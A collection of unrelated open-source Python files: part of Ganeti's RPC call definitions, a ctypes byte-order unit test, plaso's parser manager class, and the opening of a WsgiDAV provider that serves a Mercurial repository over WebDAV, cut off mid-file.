"List of hypervisor specification (name, hvparams) to ask for node "
"information"),
], _NodeInfoPreProc, None, "Return node information"),
("node_verify", MULTI, None, constants.RPC_TMO_NORMAL, [
("checkdict", None, "What to verify"),
("cluster_name", None, "Cluster name"),
("all_hvparams", None, "Dictionary mapping hypervisor names to hvparams"),
("node_groups", None, "node names mapped to their group uuids"),
("groups_cfg", None,
"a dictionary mapping group uuids to their configuration"),
], None, None, "Request verification of given parameters"),
("node_volumes", MULTI, None, constants.RPC_TMO_FAST, [], None, None,
"Gets all volumes on node(s)"),
("node_demote_from_mc", SINGLE, None, constants.RPC_TMO_FAST, [], None, None,
"Demote a node from the master candidate role"),
("node_powercycle", SINGLE, ACCEPT_OFFLINE_NODE, constants.RPC_TMO_NORMAL, [
("hypervisor", None, "Hypervisor type"),
("hvparams", None, "Hypervisor parameters"),
], None, None, "Tries to powercycle a node"),
("node_configure_ovs", SINGLE, None, constants.RPC_TMO_NORMAL, [
("ovs_name", None, "Name of the OpenvSwitch to create"),
("ovs_link", None, "Link of the OpenvSwitch to the outside"),
], None, None, "This will create and setup the OpenvSwitch"),
("node_crypto_tokens", SINGLE, None, constants.RPC_TMO_NORMAL, [
("token_request", None,
"List of tuples of requested crypto token types, actions"),
], None, None, "Handle crypto tokens of the node."),
("node_ensure_daemon", MULTI, None, constants.RPC_TMO_URGENT, [
("daemon", None, "Daemon name"),
("run", None, "Whether the daemon should be running or stopped"),
], None, None, "Ensure daemon is running on the node."),
("node_ssh_key_add", MULTI, None, constants.RPC_TMO_URGENT, [
("node_uuid", None, "UUID of the node whose key is distributed"),
("node_name", None, "Name of the node whose key is distributed"),
("potential_master_candidates", None, "Potential master candidates"),
("ssh_port_map", None, "Map of nodes' SSH ports to be used for transfers"),
("to_authorized_keys", None, "Whether the node's key should be added"
" to all nodes' 'authorized_keys' file"),
("to_public_keys", None, "Whether the node's key should be added"
" to all nodes' public key file"),
("get_public_keys", None, "Whether the node should get the other nodes'"
" public keys")],
None, None, "Distribute a new node's public SSH key on the cluster."),
("node_ssh_key_remove", MULTI, None, constants.RPC_TMO_URGENT, [
("node_uuid", None, "UUID of the node whose key is removed"),
("node_name", None, "Name of the node whose key is removed"),
("master_candidate_uuids", None, "List of UUIDs of master candidates."),
("potential_master_candidates", None, "Potential master candidates"),
("ssh_port_map", None, "Map of nodes' SSH ports to be used for transfers"),
("from_authorized_keys", None,
"If the key should be removed from the 'authorized_keys' file."),
("from_public_keys", None,
"If the key should be removed from the public key file."),
("clear_authorized_keys", None,
"If the 'authorized_keys' file of the node should be cleared."),
("clear_public_keys", None,
"If the 'ganeti_pub_keys' file of the node should be cleared.")],
None, None, "Remove a node's SSH key from the other nodes' key files."),
("node_ssh_keys_renew", MULTI, None, constants.RPC_TMO_SLOW, [
("node_uuids", None, "UUIDs of the nodes whose key is renewed"),
("node_names", None, "Names of the nodes whose key is renewed"),
("ssh_port_map", None, "Map of nodes' SSH ports to be used for transfers"),
("master_candidate_uuids", None, "List of UUIDs of master candidates."),
("potential_master_candidates", None, "Potential master candidates")],
None, None, "Renew all SSH key pairs of all nodes nodes."),
]
_MISC_CALLS = [
("lv_list", MULTI, None, constants.RPC_TMO_URGENT, [
("vg_name", None, None),
], None, None, "Gets the logical volumes present in a given volume group"),
("vg_list", MULTI, None, constants.RPC_TMO_URGENT, [], None, None,
"Gets the volume group list"),
("bridges_exist", SINGLE, None, constants.RPC_TMO_URGENT, [
("bridges_list", None, "Bridges which must be present on remote node"),
], None, None, "Checks if a node has all the bridges given"),
("etc_hosts_modify", SINGLE, None, constants.RPC_TMO_NORMAL, [
("mode", None,
"Mode to operate; currently L{constants.ETC_HOSTS_ADD} or"
" L{constants.ETC_HOSTS_REMOVE}"),
("name", None, "Hostname to be modified"),
("ip", None, "IP address (L{constants.ETC_HOSTS_ADD} only)"),
], None, None, "Modify hosts file with name"),
("drbd_helper", MULTI, None, constants.RPC_TMO_URGENT, [],
None, None, "Gets DRBD helper"),
("restricted_command", MULTI, None, constants.RPC_TMO_SLOW, [
("cmd", None, "Command name"),
], None, None, "Runs restricted command"),
("run_oob", SINGLE, None, constants.RPC_TMO_NORMAL, [
("oob_program", None, None),
("command", None, None),
("remote_node", None, None),
("timeout", None, None),
], None, None, "Runs out-of-band command"),
("hooks_runner", MULTI, None, constants.RPC_TMO_NORMAL, [
("hpath", None, None),
("phase", None, None),
("env", None, None),
], None, None, "Call the hooks runner"),
("iallocator_runner", SINGLE, None, constants.RPC_TMO_NORMAL, [
("name", None, "Iallocator name"),
("idata", None, "JSON-encoded input string"),
("default_iallocator_params", None, "Additional iallocator parameters"),
], None, None, "Call an iallocator on a remote node"),
("test_delay", MULTI, None, _TestDelayTimeout, [
("duration", None, None),
], None, None, "Sleep for a fixed time on given node(s)"),
("hypervisor_validate_params", MULTI, None, constants.RPC_TMO_NORMAL, [
("hvname", None, "Hypervisor name"),
("hvfull", None, "Parameters to be validated"),
], None, None, "Validate hypervisor params"),
("get_watcher_pause", SINGLE, None, constants.RPC_TMO_URGENT, [],
None, None, "Get watcher pause end"),
("set_watcher_pause", MULTI, None, constants.RPC_TMO_URGENT, [
("until", None, None),
], None, None, "Set watcher pause end"),
("get_file_info", SINGLE, None, constants.RPC_TMO_FAST, [
("file_path", None, None),
], None, None, "Checks if a file exists and reports on it"),
]
CALLS = {
"RpcClientDefault":
_Prepare(_IMPEXP_CALLS + _X509_CALLS + _OS_CALLS + _NODE_CALLS +
_FILE_STORAGE_CALLS + _MISC_CALLS + _INSTANCE_CALLS +
_BLOCKDEV_CALLS + _STORAGE_CALLS + _EXTSTORAGE_CALLS),
"RpcClientJobQueue": _Prepare([
("jobqueue_update", MULTI, None, constants.RPC_TMO_URGENT, [
("file_name", None, None),
("content", ED_COMPRESS, None),
], None, None, "Update job queue file"),
("jobqueue_purge", SINGLE, None, constants.RPC_TMO_NORMAL, [], None, None,
"Purge job queue"),
("jobqueue_rename", MULTI, None, constants.RPC_TMO_URGENT, [
("rename", None, None),
], None, None, "Rename job queue file"),
("jobqueue_set_drain_flag", MULTI, None, constants.RPC_TMO_URGENT, [
("flag", None, None),
], None, None, "Set job queue drain flag"),
]),
"RpcClientBootstrap": _Prepare([
("node_start_master_daemons", SINGLE, None, constants.RPC_TMO_FAST, [
("no_voting", None, None),
], None, None, "Starts master daemons on a node"),
("node_activate_master_ip", SINGLE, None, constants.RPC_TMO_FAST, [
("master_params", ED_OBJECT_DICT, "Network parameters of the master"),
("use_external_mip_script", None,
"Whether to use the user-provided master IP address setup script"),
], None, None,
"Activates master IP on a node"),
("node_stop_master", SINGLE, None, constants.RPC_TMO_FAST, [], None, None,
"Deactivates master IP and stops master daemons on a node"),
("node_deactivate_master_ip", SINGLE, None, constants.RPC_TMO_FAST, [
("master_params", ED_OBJECT_DICT, "Network parameters of the master"),
("use_external_mip_script", None,
"Whether to use the user-provided master IP address setup script"),
], None, None,
"Deactivates master IP on a node"),
("node_change_master_netmask", SINGLE, None, constants.RPC_TMO_FAST, [
("old_netmask", None, "The old value of the netmask"),
("netmask", None, "The new value of the netmask"),
("master_ip", None, "The master IP"),
("master_netdev", None, "The master network device"),
], None, None, "Change master IP netmask"),
("node_leave_cluster", SINGLE, None, constants.RPC_TMO_NORMAL, [
("modify_ssh_setup", None, None),
], None, None,
"Requests a node to clean the cluster information it has"),
("master_node_name", MULTI, None, constants.RPC_TMO_URGENT, [], None, None,
"Returns the master node name"),
]),
"RpcClientDnsOnly": _Prepare([
("version", MULTI, ACCEPT_OFFLINE_NODE, constants.RPC_TMO_URGENT, [], None,
None, "Query node version"),
("node_verify_light", MULTI, None, constants.RPC_TMO_NORMAL, [
("checkdict", None, "What to verify"),
("cluster_name", None, "Cluster name"),
("hvparams", None, "Dictionary mapping hypervisor names to hvparams"),
("node_groups", None, "node names mapped to their group uuids"),
("groups_cfg", None,
"a dictionary mapping group uuids to their configuration"),
], None, None, "Request verification of given parameters"),
]),
"RpcClientConfig": _Prepare([
("upload_file", MULTI, None, constants.RPC_TMO_NORMAL, [
("file_name", ED_FILE_DETAILS, None),
], None, None, "Upload files"),
("upload_file_single", MULTI, None, constants.RPC_TMO_NORMAL, [
("file_name", None, "The name of the file"),
("content", ED_COMPRESS, "The data to be uploaded"),
("mode", None, "The mode of the file or None"),
("uid", None, "The owner of the file"),
("gid", None, "The group of the file"),
("atime", None, "The file's last access time"),
("mtime", None, "The file's last modification time"),
], None, None, "Upload files"),
("write_ssconf_files", MULTI, None, constants.RPC_TMO_NORMAL, [
("values", None, None),
], None, None, "Write ssconf files"),
]),
}
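# Illustrative only: a minimal sketch for inspecting the prepared call tables
# when this module is run directly. It assumes only that _Prepare() returns a
# dictionary per client (see its docstring); the keys are whatever
# utils.SequenceToDict uses, normally the call names.
if __name__ == "__main__":
  for _client in sorted(CALLS):
    print "%s (%d calls):" % (_client, len(CALLS[_client]))
    for _call in sorted(CALLS[_client]):
      print "  %s" % _call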
|
|
import sys, unittest, struct, math
from binascii import hexlify
from ctypes import *
def bin(s):
return hexlify(buffer(s)).upper()
# Each *simple* type that supports different byte orders has an
# __ctype_be__ attribute that specifies the same type in BIG ENDIAN
# byte order, and a __ctype_le__ attribute that is the same type in
# LITTLE ENDIAN byte order.
#
# For Structures and Unions, these types are created on demand.
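# For example (illustrative, assuming a little-endian host), with the bin()
# helper defined above:
#   c_int.__ctype_le__ is c_int        -> True
#   bin(c_int(1))                      -> "01000000"
#   bin(c_int.__ctype_be__(1))         -> "00000001"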
class Test(unittest.TestCase):
def X_test(self):
print >> sys.stderr, sys.byteorder
for i in range(32):
bits = BITS()
setattr(bits, "i%s" % i, 1)
dump(bits)
def test_endian_short(self):
if sys.byteorder == "little":
self.failUnless(c_short.__ctype_le__ is c_short)
self.failUnless(c_short.__ctype_be__.__ctype_le__ is c_short)
else:
self.failUnless(c_short.__ctype_be__ is c_short)
self.failUnless(c_short.__ctype_le__.__ctype_be__ is c_short)
s = c_short.__ctype_be__(0x1234)
self.failUnlessEqual(bin(struct.pack(">h", 0x1234)), "1234")
self.failUnlessEqual(bin(s), "1234")
self.failUnlessEqual(s.value, 0x1234)
s = c_short.__ctype_le__(0x1234)
self.failUnlessEqual(bin(struct.pack("<h", 0x1234)), "3412")
self.failUnlessEqual(bin(s), "3412")
self.failUnlessEqual(s.value, 0x1234)
s = c_ushort.__ctype_be__(0x1234)
self.failUnlessEqual(bin(struct.pack(">h", 0x1234)), "1234")
self.failUnlessEqual(bin(s), "1234")
self.failUnlessEqual(s.value, 0x1234)
s = c_ushort.__ctype_le__(0x1234)
self.failUnlessEqual(bin(struct.pack("<h", 0x1234)), "3412")
self.failUnlessEqual(bin(s), "3412")
self.failUnlessEqual(s.value, 0x1234)
def test_endian_int(self):
if sys.byteorder == "little":
self.failUnless(c_int.__ctype_le__ is c_int)
self.failUnless(c_int.__ctype_be__.__ctype_le__ is c_int)
else:
self.failUnless(c_int.__ctype_be__ is c_int)
self.failUnless(c_int.__ctype_le__.__ctype_be__ is c_int)
s = c_int.__ctype_be__(0x12345678)
self.failUnlessEqual(bin(struct.pack(">i", 0x12345678)), "12345678")
self.failUnlessEqual(bin(s), "12345678")
self.failUnlessEqual(s.value, 0x12345678)
s = c_int.__ctype_le__(0x12345678)
self.failUnlessEqual(bin(struct.pack("<i", 0x12345678)), "78563412")
self.failUnlessEqual(bin(s), "78563412")
self.failUnlessEqual(s.value, 0x12345678)
s = c_uint.__ctype_be__(0x12345678)
self.failUnlessEqual(bin(struct.pack(">I", 0x12345678)), "12345678")
self.failUnlessEqual(bin(s), "12345678")
self.failUnlessEqual(s.value, 0x12345678)
s = c_uint.__ctype_le__(0x12345678)
self.failUnlessEqual(bin(struct.pack("<I", 0x12345678)), "78563412")
self.failUnlessEqual(bin(s), "78563412")
self.failUnlessEqual(s.value, 0x12345678)
def test_endian_longlong(self):
if sys.byteorder == "little":
self.failUnless(c_longlong.__ctype_le__ is c_longlong)
self.failUnless(c_longlong.__ctype_be__.__ctype_le__ is c_longlong)
else:
self.failUnless(c_longlong.__ctype_be__ is c_longlong)
self.failUnless(c_longlong.__ctype_le__.__ctype_be__ is c_longlong)
s = c_longlong.__ctype_be__(0x1234567890ABCDEF)
self.failUnlessEqual(bin(struct.pack(">q", 0x1234567890ABCDEF)), "1234567890ABCDEF")
self.failUnlessEqual(bin(s), "1234567890ABCDEF")
self.failUnlessEqual(s.value, 0x1234567890ABCDEF)
s = c_longlong.__ctype_le__(0x1234567890ABCDEF)
self.failUnlessEqual(bin(struct.pack("<q", 0x1234567890ABCDEF)), "EFCDAB9078563412")
self.failUnlessEqual(bin(s), "EFCDAB9078563412")
self.failUnlessEqual(s.value, 0x1234567890ABCDEF)
s = c_ulonglong.__ctype_be__(0x1234567890ABCDEF)
self.failUnlessEqual(bin(struct.pack(">Q", 0x1234567890ABCDEF)), "1234567890ABCDEF")
self.failUnlessEqual(bin(s), "1234567890ABCDEF")
self.failUnlessEqual(s.value, 0x1234567890ABCDEF)
s = c_ulonglong.__ctype_le__(0x1234567890ABCDEF)
self.failUnlessEqual(bin(struct.pack("<Q", 0x1234567890ABCDEF)), "EFCDAB9078563412")
self.failUnlessEqual(bin(s), "EFCDAB9078563412")
self.failUnlessEqual(s.value, 0x1234567890ABCDEF)
def test_endian_float(self):
if sys.byteorder == "little":
self.failUnless(c_float.__ctype_le__ is c_float)
self.failUnless(c_float.__ctype_be__.__ctype_le__ is c_float)
else:
self.failUnless(c_float.__ctype_be__ is c_float)
self.failUnless(c_float.__ctype_le__.__ctype_be__ is c_float)
s = c_float(math.pi)
self.failUnlessEqual(bin(struct.pack("f", math.pi)), bin(s))
# Hm, what's the precision of a float compared to a double?
self.failUnlessAlmostEqual(s.value, math.pi, 6)
s = c_float.__ctype_le__(math.pi)
self.failUnlessAlmostEqual(s.value, math.pi, 6)
self.failUnlessEqual(bin(struct.pack("<f", math.pi)), bin(s))
s = c_float.__ctype_be__(math.pi)
self.failUnlessAlmostEqual(s.value, math.pi, 6)
self.failUnlessEqual(bin(struct.pack(">f", math.pi)), bin(s))
def test_endian_double(self):
if sys.byteorder == "little":
self.failUnless(c_double.__ctype_le__ is c_double)
self.failUnless(c_double.__ctype_be__.__ctype_le__ is c_double)
else:
self.failUnless(c_double.__ctype_be__ is c_double)
self.failUnless(c_double.__ctype_le__.__ctype_be__ is c_double)
s = c_double(math.pi)
self.failUnlessEqual(s.value, math.pi)
self.failUnlessEqual(bin(struct.pack("d", math.pi)), bin(s))
s = c_double.__ctype_le__(math.pi)
self.failUnlessEqual(s.value, math.pi)
self.failUnlessEqual(bin(struct.pack("<d", math.pi)), bin(s))
s = c_double.__ctype_be__(math.pi)
self.failUnlessEqual(s.value, math.pi)
self.failUnlessEqual(bin(struct.pack(">d", math.pi)), bin(s))
def test_endian_other(self):
self.failUnless(c_byte.__ctype_le__ is c_byte)
self.failUnless(c_byte.__ctype_be__ is c_byte)
self.failUnless(c_ubyte.__ctype_le__ is c_ubyte)
self.failUnless(c_ubyte.__ctype_be__ is c_ubyte)
self.failUnless(c_char.__ctype_le__ is c_char)
self.failUnless(c_char.__ctype_be__ is c_char)
def test_struct_fields_1(self):
if sys.byteorder == "little":
base = BigEndianStructure
else:
base = LittleEndianStructure
class T(base):
pass
_fields_ = [("a", c_ubyte),
("b", c_byte),
("c", c_short),
("d", c_ushort),
("e", c_int),
("f", c_uint),
("g", c_long),
("h", c_ulong),
("i", c_longlong),
("k", c_ulonglong),
("l", c_float),
("m", c_double),
("n", c_char),
("b1", c_byte, 3),
("b2", c_byte, 3),
("b3", c_byte, 2),
("a", c_int * 3 * 3 * 3)]
T._fields_ = _fields_
# these fields do not support different byte order:
for typ in c_wchar, c_void_p, POINTER(c_int):
_fields_.append(("x", typ))
class T(base):
pass
self.assertRaises(TypeError, setattr, T, "_fields_", [("x", typ)])
def test_struct_struct(self):
# Nested structures with different byte order not (yet) supported
if sys.byteorder == "little":
base = BigEndianStructure
else:
base = LittleEndianStructure
class T(Structure):
_fields_ = [("a", c_int),
("b", c_int)]
class S(base):
pass
self.assertRaises(TypeError, setattr, S, "_fields_", [("s", T)])
def test_struct_fields_2(self):
# standard packing in struct uses no alignment.
# So, we have to align using pad bytes.
#
# Unaligned accesses will crash Python (on those platforms that
# don't allow it, like sparc solaris).
if sys.byteorder == "little":
base = BigEndianStructure
fmt = ">bxhid"
else:
base = LittleEndianStructure
fmt = "<bxhid"
class S(base):
_fields_ = [("b", c_byte),
("h", c_short),
("i", c_int),
("d", c_double)]
s1 = S(0x12, 0x1234, 0x12345678, 3.14)
s2 = struct.pack(fmt, 0x12, 0x1234, 0x12345678, 3.14)
self.failUnlessEqual(bin(s1), bin(s2))
def test_unaligned_nonnative_struct_fields(self):
if sys.byteorder == "little":
base = BigEndianStructure
fmt = ">b h xi xd"
else:
base = LittleEndianStructure
fmt = "<b h xi xd"
class S(base):
_pack_ = 1
_fields_ = [("b", c_byte),
("h", c_short),
("_1", c_byte),
("i", c_int),
("_2", c_byte),
("d", c_double)]
s1 = S()
s1.b = 0x12
s1.h = 0x1234
s1.i = 0x12345678
s1.d = 3.14
s2 = struct.pack(fmt, 0x12, 0x1234, 0x12345678, 3.14)
self.failUnlessEqual(bin(s1), bin(s2))
def test_unaligned_native_struct_fields(self):
if sys.byteorder == "little":
fmt = "<b h xi xd"
else:
base = LittleEndianStructure
fmt = ">b h xi xd"
class S(Structure):
_pack_ = 1
_fields_ = [("b", c_byte),
("h", c_short),
("_1", c_byte),
("i", c_int),
("_2", c_byte),
("d", c_double)]
s1 = S()
s1.b = 0x12
s1.h = 0x1234
s1.i = 0x12345678
s1.d = 3.14
s2 = struct.pack(fmt, 0x12, 0x1234, 0x12345678, 3.14)
self.failUnlessEqual(bin(s1), bin(s2))
if __name__ == "__main__":
unittest.main()
|
|
# -*- coding: utf-8 -*-
"""The parsers and plugins manager objects."""
import pysigscan
from plaso.frontend import presets
from plaso.lib import specification
class ParsersManager(object):
"""Class that implements the parsers manager."""
_parser_classes = {}
@classmethod
def DeregisterParser(cls, parser_class):
"""Deregisters a parser class.
The parser classes are identified based on their lower case name.
Args:
parser_class: the class object of the parser.
Raises:
KeyError: if parser class is not set for the corresponding name.
"""
parser_name = parser_class.NAME.lower()
if parser_name not in cls._parser_classes:
raise KeyError(u'Parser class not set for name: {0:s}.'.format(
parser_class.NAME))
del cls._parser_classes[parser_name]
@classmethod
def GetFilterListsFromString(cls, parser_filter_string):
"""Determines an include and exclude list of parser and plugin names.
    Takes a comma separated string and splits it into two lists of parser
    names: those to include and those to exclude from selection. If a
    particular filter is prefixed with a minus sign it is placed in the
    exclude list, otherwise in the include list.
Args:
parser_filter_string: The parser filter string.
Returns:
A tuple of two lists, include and exclude.
"""
includes = []
excludes = []
if not parser_filter_string:
return includes, excludes
preset_categories = presets.categories.keys()
for filter_string in parser_filter_string.split(u','):
filter_string = filter_string.strip()
if not filter_string:
continue
if filter_string.startswith(u'-'):
active_list = excludes
filter_string = filter_string[1:]
else:
active_list = includes
filter_string = filter_string.lower()
if filter_string in cls._parser_classes:
parser_class = cls._parser_classes[filter_string]
active_list.append(filter_string)
if parser_class.SupportsPlugins():
active_list.extend(parser_class.GetPluginNames())
elif filter_string in preset_categories:
active_list.extend(
presets.GetParsersFromCategory(filter_string))
else:
active_list.append(filter_string)
return includes, excludes
@classmethod
def GetParserFilterListsFromString(cls, parser_filter_string):
"""Determines an include and exclude list of parser names.
    Takes a comma separated string and splits it into two lists of parser
    names: those to include and those to exclude from selection. If a
    particular filter is prefixed with a minus sign it is placed in the
    exclude list, otherwise in the include list.
Args:
parser_filter_string: The parser filter string.
Returns:
A tuple of two lists, include and exclude.
"""
if not parser_filter_string:
return [], []
# Build the plugin to parser map, which cannot be a class member
# otherwise the map will become invalid if a parser with plugins
# is deregistered.
plugin_to_parser_map = {}
for parser_name, parser_class in cls._parser_classes.iteritems():
if parser_class.SupportsPlugins():
for plugin_name in parser_class.GetPluginNames():
plugin_to_parser_map[plugin_name] = parser_name
includes = set()
excludes = set()
preset_categories = presets.categories.keys()
for filter_string in parser_filter_string.split(u','):
filter_string = filter_string.strip()
if not filter_string:
continue
if filter_string.startswith(u'-'):
active_list = excludes
filter_string = filter_string[1:]
else:
active_list = includes
filter_string = filter_string.lower()
if filter_string in cls._parser_classes:
active_list.add(filter_string)
elif filter_string in preset_categories:
for entry in presets.GetParsersFromCategory(filter_string):
active_list.add(plugin_to_parser_map.get(entry, entry))
else:
active_list.add(plugin_to_parser_map.get(
filter_string, filter_string))
return list(includes), list(excludes)
@classmethod
def GetParserNames(cls, parser_filter_string=None):
"""Retrieves the parser names.
Args:
parser_filter_string: Optional parser filter string. The default is None.
Returns:
A list of parser names.
"""
parser_names = []
for parser_name, _ in cls.GetParsers(
parser_filter_string=parser_filter_string):
parser_names.append(parser_name)
return parser_names
@classmethod
def GetParserPluginsInformation(cls):
"""Retrieves the parser plugins information.
Returns:
A list of tuples of parser plugin names and descriptions.
"""
parser_plugins_information = []
for _, parser_class in cls.GetParsers():
if parser_class.SupportsPlugins():
for _, plugin_class in parser_class.GetPlugins():
description = getattr(plugin_class, u'DESCRIPTION', u'')
parser_plugins_information.append((plugin_class.NAME, description))
return parser_plugins_information
@classmethod
def GetParserObjects(cls, parser_filter_string=None):
"""Retrieves the parser objects.
Args:
parser_filter_string: Optional parser filter string. The default is None.
Returns:
A dictionary mapping parser names to parsers objects (instances of
BaseParser).
"""
parser_objects = {}
for parser_name, parser_class in cls.GetParsers(
parser_filter_string=parser_filter_string):
parser_objects[parser_name] = parser_class()
return parser_objects
@classmethod
def GetParsers(cls, parser_filter_string=None):
"""Retrieves the registered parsers.
Retrieves a list of all registered parsers from a parser filter string.
The filter string can contain direct names of parsers, presets or plugins.
The filter string can also negate selection if prepended with a minus sign,
eg: foo,-bar would include parser foo but not include parser bar.
The three types of entries in the filter string:
* name of a parser: this would be the exact name of a single parser to
include (or exclude), eg: foo;
* name of a preset, eg. win7: the presets are defined in
plaso.frontend.presets;
* name of a plugin: if a plugin name is included the parent parser will be
included in the list of registered parsers;
Args:
parser_filter_string: Optional parser filter string. The default is None.
Yields:
A tuple that contains the uniquely identifying name of the parser
and the parser class (subclass of BaseParser).
"""
parsers_to_include, parsers_to_exclude = cls.GetParserFilterListsFromString(
parser_filter_string)
# TODO: Add a warning in the case where an exclusion excludes a parser
# that is also in the inclusion list, eg: user selects chrome_history but
# excludes sqlite.
for parser_name, parser_class in cls._parser_classes.iteritems():
if parsers_to_exclude and parser_name in parsers_to_exclude:
continue
if parsers_to_include and parser_name not in parsers_to_include:
continue
yield parser_name, parser_class
@classmethod
def GetParsersInformation(cls):
"""Retrieves the parsers information.
Returns:
A list of tuples of parser names and descriptions.
"""
parsers_information = []
for _, parser_class in cls.GetParsers():
description = getattr(parser_class, u'DESCRIPTION', u'')
parsers_information.append((parser_class.NAME, description))
return parsers_information
@classmethod
def GetScanner(cls, specification_store):
"""Initializes the scanner object form the specification store.
Args:
specification_store: a specification store (instance of
FormatSpecificationStore).
Returns:
A scanner object (instance of pysigscan.scanner).
"""
scanner_object = pysigscan.scanner()
for format_specification in specification_store.specifications:
for signature in format_specification.signatures:
pattern_offset = signature.offset
if pattern_offset is None:
signature_flags = pysigscan.signature_flags.NO_OFFSET
elif pattern_offset < 0:
pattern_offset *= -1
signature_flags = pysigscan.signature_flags.RELATIVE_FROM_END
else:
signature_flags = pysigscan.signature_flags.RELATIVE_FROM_START
scanner_object.add_signature(
signature.identifier, pattern_offset, signature.pattern,
signature_flags)
return scanner_object
@classmethod
def GetSpecificationStore(cls, parser_filter_string=None):
"""Retrieves the specification store for the parsers.
This method will create a specification store for parsers that define
a format specification and a list of parser names for those that do not.
Args:
parser_filter_string: Optional parser filter string. The default is None.
Returns:
A tuple of a format specification store (instance of
FormatSpecificationStore) and the list of remaining parser names
that do not have a format specification.
"""
specification_store = specification.FormatSpecificationStore()
remainder_list = []
for parser_name, parser_class in cls.GetParsers(
parser_filter_string=parser_filter_string):
format_specification = parser_class.GetFormatSpecification()
if format_specification is not None:
specification_store.AddSpecification(format_specification)
else:
remainder_list.append(parser_name)
return specification_store, remainder_list
@classmethod
def GetWindowsRegistryPlugins(cls):
"""Build a list of all available Windows Registry plugins.
Returns:
A plugins list (instance of PluginList).
"""
parser_class = cls._parser_classes.get(u'winreg', None)
if not parser_class:
return
return parser_class.GetPluginList()
@classmethod
def RegisterParser(cls, parser_class):
"""Registers a parser class.
The parser classes are identified based on their lower case name.
Args:
parser_class: the class object of the parser.
Raises:
KeyError: if parser class is already set for the corresponding name.
"""
parser_name = parser_class.NAME.lower()
if parser_name in cls._parser_classes:
raise KeyError((u'Parser class already set for name: {0:s}.').format(
parser_class.NAME))
cls._parser_classes[parser_name] = parser_class
@classmethod
def RegisterParsers(cls, parser_classes):
"""Registers parser classes.
The parser classes are identified based on their lower case name.
Args:
parser_classes: a list of class objects of the parsers.
Raises:
KeyError: if parser class is already set for the corresponding name.
"""
for parser_class in parser_classes:
cls.RegisterParser(parser_class)
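# Illustrative usage sketch; the filter string below is a hypothetical example.
# With no parser classes registered, unknown names are passed through as-is.
if __name__ == '__main__':
  _includes, _excludes = ParsersManager.GetParserFilterListsFromString(
      u'winreg,-chrome_history')
  print u'Includes: {0:s}'.format(u', '.join(_includes))
  print u'Excludes: {0:s}'.format(u', '.join(_excludes))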
|
|
# -*- coding: iso-8859-1 -*-
# (c) 2009-2014 Martin Wendt and contributors; see WsgiDAV https://github.com/mar10/wsgidav
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
"""
DAV provider that publishes a Mercurial repository.
Note: This is **not** production code!
The repository is rendered as three top level collections.
edit:
Contains the working directory, i.e. all files. This includes uncommitted
changes and untracked new files.
This folder is writable.
released:
Contains the latest committed files, also known as 'tip'.
This folder is read-only.
archive:
Contains the last 10 revisions as sub-folders.
This folder is read-only.
Sample layout::
/<share>/
edit/
server/
ext_server.py
README.txt
released/
archive/
19/
18/
...
Supported features:
#. Copying or moving files from ``/edit/..`` to the ``/edit/..`` folder will
result in a ``hg copy`` or ``hg rename``.
#. Deleting resources from ``/edit/..`` will result in a ``hg remove``.
#. Copying or moving files from ``/edit/..`` to the ``/released`` folder will
result in a ``hg commit``.
   Note that the destination path is ignored; instead, the source path is used.
So a user can drag a file or folder from somewhere under the ``edit/..``
directory and drop it directly on the ``released`` directory to commit
changes.
#. To commit all changes, simply drag'n'drop the ``/edit`` folder on the
``/released`` folder.
#. Creating new collections results in creation of a file called ``.directory``,
   which is then ``hg add``-ed, since Mercurial doesn't track directories.
#. Some attributes are published as live properties, such as ``{hg:}date``.
Known limitations:
#. This 'commit by drag-and-drop' only works, if the WebDAV clients produces
MOVE or COPY requests. Alas, some clients will send PUT, MKCOL, ... sequences
instead.
#. Adding and then removing a file without committing after the 'add' will
   leave this file on disk (untracked).
   This happens for example with lock files that OpenOffice Writer and other
   applications will create.
#. Dragging the 'edit' folder onto 'released' with Windows File Explorer will
remove the folder in the explorer view, although WsgiDAV did not delete it.
This seems to be done by the client.
See:
http://mercurial.selenic.com/wiki/MercurialApi
Requirements:
``easy_install mercurial`` or install the API as non-standalone version
from here: http://mercurial.berkwood.com/
http://mercurial.berkwood.com/binaries/mercurial-1.4.win32-py2.6.exe
"""
from pprint import pprint
from wsgidav.dav_error import DAVError, HTTP_FORBIDDEN
import os
from wsgidav.samples.dav_provider_tools import VirtualCollection
try:
from hashlib import md5
except ImportError:
from md5 import md5
import time
import sys
#import mimetypes
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO #@UnusedImport
from wsgidav.dav_provider import DAVProvider, _DAVResource
from wsgidav import util
try:
import mercurial.ui
from mercurial.__version__ import version as hgversion
from mercurial import commands, hg
#from mercurial import util as hgutil
except ImportError:
print >>sys.stderr, "Could not import Mercurial API. Try 'easy_install -U mercurial'."
raise
__docformat__ = "reStructuredText en"
_logger = util.getModuleLogger(__name__)
BUFFER_SIZE = 8192
#===============================================================================
# HgResource
#===============================================================================
class HgResource(_DAVResource):
"""Abstract base class for all resources."""
def __init__(self, path, isCollection, environ, rev, localHgPath):
super(HgResource, self).__init__(path, isCollection, environ)
self.rev = rev
self.localHgPath = localHgPath
self.absFilePath = self._getFilePath()
assert not "\\" in self.localHgPath
assert not "/" in self.absFilePath
if isCollection:
self.fctx = None
else:
# Change Context for the requested revision:
# rev=None: current working dir
# rev="tip": TIP
# rev=<int>: Revision ID
wdctx = self.provider.repo[self.rev]
self.fctx = wdctx[self.localHgPath]
# util.status("HgResource: path=%s, rev=%s, localHgPath=%s, fctx=%s" % (self.path, self.rev, self.localHgPath, self.fctx))
# util.status("HgResource: name=%s, dn=%s, abspath=%s" % (self.name, self.getDisplayName(), self.absFilePath))
def _getFilePath(self, *addParts):
parts = self.localHgPath.split("/")
if addParts:
parts.extend(addParts)
return os.path.join(self.provider.repo.root, *parts)
def _commit(self, message):
user = self.environ.get("http_authenticator.username") or "Anonymous"
commands.commit(self.provider.ui, self.provider.repo,
self.localHgPath,
addremove=True,
user=user,
message=message)
def _checkWriteAccess(self):
"""Raise HTTP_FORBIDDEN, if resource is unwritable."""
if self.rev is not None:
# Only working directory may be edited
raise DAVError(HTTP_FORBIDDEN)
def getContentLength(self):
if self.isCollection:
return None
return self.fctx.size()
def getContentType(self):
if self.isCollection:
return None
# (mimetype, _mimeencoding) = mimetypes.guess_type(self.path)
# if not mimetype:
# return "application/octet-stream"
# return mimetype
return util.guessMimeType(self.path)
def getCreationDate(self):
# statresults = os.stat(self._filePath)
# return statresults[stat.ST_CTIME]
return None # TODO
def getDisplayName(self):
if self.isCollection or self.fctx.filerev() is None:
return self.name
return "%s@%s" % (self.name, self.fctx.filerev())
def getEtag(self):
